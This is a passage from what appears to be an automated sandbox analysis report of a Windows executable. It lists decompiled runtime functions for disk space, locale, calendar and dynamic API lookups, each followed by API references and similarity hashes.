                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Locale$Info$Valid
                                                                    • String ID:
                                                                    • API String ID: 1826331170-0
                                                                    • Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                    • Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
                                                                    • Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                    • Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041A4DC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E004095A8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E004095A8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                                                    0x0041a4e3
                                                                    0x0041a4e8
                                                                    0x0041a4ea
                                                                    0x0041a4ea
                                                                    0x0041a4fd
                                                                    0x0041a50c
                                                                    0x0041a50f
                                                                    0x0041a51c
                                                                    0x0041a51f
                                                                    0x0041a524
                                                                    0x0041a527
                                                                    0x0041a529
                                                                    0x0041a536
                                                                    0x0041a539
                                                                    0x0041a53e
                                                                    0x0041a541
                                                                    0x0041a543
                                                                    0x0041a54c

                                                                    APIs
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1705453755-0
                                                                    • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                    • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                                    • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                    • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041E034, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				void* __ebp;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00407E00(_t10, _t18);
				}
				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
			}








                                                                    0x0041e03f
                                                                    0x0041e041
                                                                    0x0041e052
                                                                    0x0041e057
                                                                    0x0041e059
                                                                    0x00000000
                                                                    0x0041e071
                                                                    0x00000000

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                    • Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
                                                                    • Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                    • Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041E080, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E0041E080(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}






                                                                    0x0041e083
                                                                    0x0041e084
                                                                    0x0041e09a
                                                                    0x0041e0a2
                                                                    0x0041e09c
                                                                    0x0041e09c
                                                                    0x0041e09c
                                                                    0x0041e0a8

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                    • Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
                                                                    • Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                    • Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AF218, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004AF218(signed int __eax) {
				short _v8;
				signed int _t6;

				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
				if(_t6 <= 0) {
					return _t6 | 0xffffffff;
				}
				return _v8;
			}





                                                                    0x004af22e
                                                                    0x004af235
                                                                    0x00000000
                                                                    0x004af23c
                                                                    0x00000000

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                    • Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
                                                                    • Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                    • Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041C3D8, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0041C3D8() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}




                                                                    0x0041c3dc
                                                                    0x0041c3e8

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID:
                                                                    • API String ID: 481472006-0
                                                                    • Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                    • Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
                                                                    • Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                    • Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405AE0, Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                    • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                    • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                    • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}






                                                                    0x00427882
                                                                    0x00427896
                                                                    0x004278ac
                                                                    0x004278c2
                                                                    0x004278d8
                                                                    0x004278ee
                                                                    0x00427904
                                                                    0x0042791a
                                                                    0x00427930
                                                                    0x00427946
                                                                    0x0042795c
                                                                    0x00427972
                                                                    0x00427988
                                                                    0x0042799e
                                                                    0x004279b4
                                                                    0x004279ca
                                                                    0x004279e0
                                                                    0x004279f6
                                                                    0x00427a0c
                                                                    0x00427a22
                                                                    0x00427a38
                                                                    0x00427a4e
                                                                    0x00427a5e
                                                                    0x00427a64
                                                                    0x00427a6b

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                                      • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                    • API String ID: 1646373207-1918263038
                                                                    • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                    • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                                    • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                    • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}


































                                                                    0x0041e7cc
                                                                    0x0041e7cc
                                                                    0x0041e7cc
                                                                    0x0041e7cd
                                                                    0x0041e7cf
                                                                    0x0041e7d4
                                                                    0x0041e7d7
                                                                    0x0041e7da
                                                                    0x0041e7dd
                                                                    0x0041e7e1
                                                                    0x0041e7e2
                                                                    0x0041e7e7
                                                                    0x0041e7ea
                                                                    0x0041e7ed
                                                                    0x0041e7f2
                                                                    0x0041e7f5
                                                                    0x0041e7f9
                                                                    0x0041e7f9
                                                                    0x0041e80b
                                                                    0x0041e812
                                                                    0x0041e813
                                                                    0x0041e818
                                                                    0x0041e81b
                                                                    0x0041e820
                                                                    0x0041e826
                                                                    0x0041e837
                                                                    0x0041e83c
                                                                    0x0041e84f
                                                                    0x0041e861
                                                                    0x0041e86b
                                                                    0x0041e8c8
                                                                    0x0041e8cb
                                                                    0x0041e8d6
                                                                    0x0041e8dc
                                                                    0x0041e8ed
                                                                    0x0041e8f2
                                                                    0x0041e8ff
                                                                    0x0041e90b
                                                                    0x0041e90e
                                                                    0x0041e913
                                                                    0x0041e91a
                                                                    0x0041e92d
                                                                    0x0041e937
                                                                    0x0041e93a
                                                                    0x0041e93d
                                                                    0x0041e945
                                                                    0x0041e948
                                                                    0x0041e957
                                                                    0x0041e95c
                                                                    0x0041e961
                                                                    0x0041e963
                                                                    0x0041e965
                                                                    0x0041e965
                                                                    0x0041e968
                                                                    0x0041e968
                                                                    0x0041e96c
                                                                    0x0041e96d
                                                                    0x0041e96f
                                                                    0x0041e971
                                                                    0x0041e976
                                                                    0x0041e97f
                                                                    0x0041e987
                                                                    0x0041e988
                                                                    0x0041e988
                                                                    0x0041e988
                                                                    0x0041e976
                                                                    0x0041e999
                                                                    0x0041e999
                                                                    0x0041e86d
                                                                    0x0041e87b
                                                                    0x0041e880
                                                                    0x0041e887
                                                                    0x0041e88c
                                                                    0x0041e88c
                                                                    0x0041e890
                                                                    0x0041e893
                                                                    0x0041e895
                                                                    0x0041e896
                                                                    0x0041e898
                                                                    0x0041e8a1
                                                                    0x0041e8a9
                                                                    0x0041e8aa
                                                                    0x0041e8aa
                                                                    0x0041e898
                                                                    0x0041e8bb
                                                                    0x0041e8bb
                                                                    0x0041e9a3
                                                                    0x0041e9a7
                                                                    0x0041e9ac
                                                                    0x0041e9ac
                                                                    0x0041e9ae
                                                                    0x0041e9c2
                                                                    0x0041e9ca
                                                                    0x0041e9d1
                                                                    0x0041e9d6
                                                                    0x0041e9d6
                                                                    0x0041e9da
                                                                    0x0041e9dd
                                                                    0x0041e9df
                                                                    0x0041e9e0
                                                                    0x0041e9e2
                                                                    0x0041e9e2
                                                                    0x0041e9fa
                                                                    0x0041ea00
                                                                    0x0041ea05
                                                                    0x0041ea06
                                                                    0x0041ea06
                                                                    0x0041e9e2
                                                                    0x0041ea0e
                                                                    0x0041ea14
                                                                    0x0041ea19
                                                                    0x0041ea20
                                                                    0x0041ea25
                                                                    0x0041ea25
                                                                    0x0041ea27
                                                                    0x0041ea2e
                                                                    0x0041ea30
                                                                    0x0041ea31
                                                                    0x0041ea34
                                                                    0x0041ea43

                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CalendarEnumInfoLocaleThread
                                                                    • String ID: B.C.$ToA$K$K$K
                                                                    • API String ID: 683597275-1724967715
                                                                    • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                    • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                                    • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                    • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}





                                                                    0x0040a255
                                                                    0x0040a25a
                                                                    0x0040a268
                                                                    0x0040a270
                                                                    0x0040a27e
                                                                    0x0040a295
                                                                    0x0040a2af
                                                                    0x0040a2c4
                                                                    0x0040a2c9
                                                                    0x00000000
                                                                    0x0040a2c9
                                                                    0x0040a2ce

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                    • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                    Strings
                                                                    Memory Dump Source
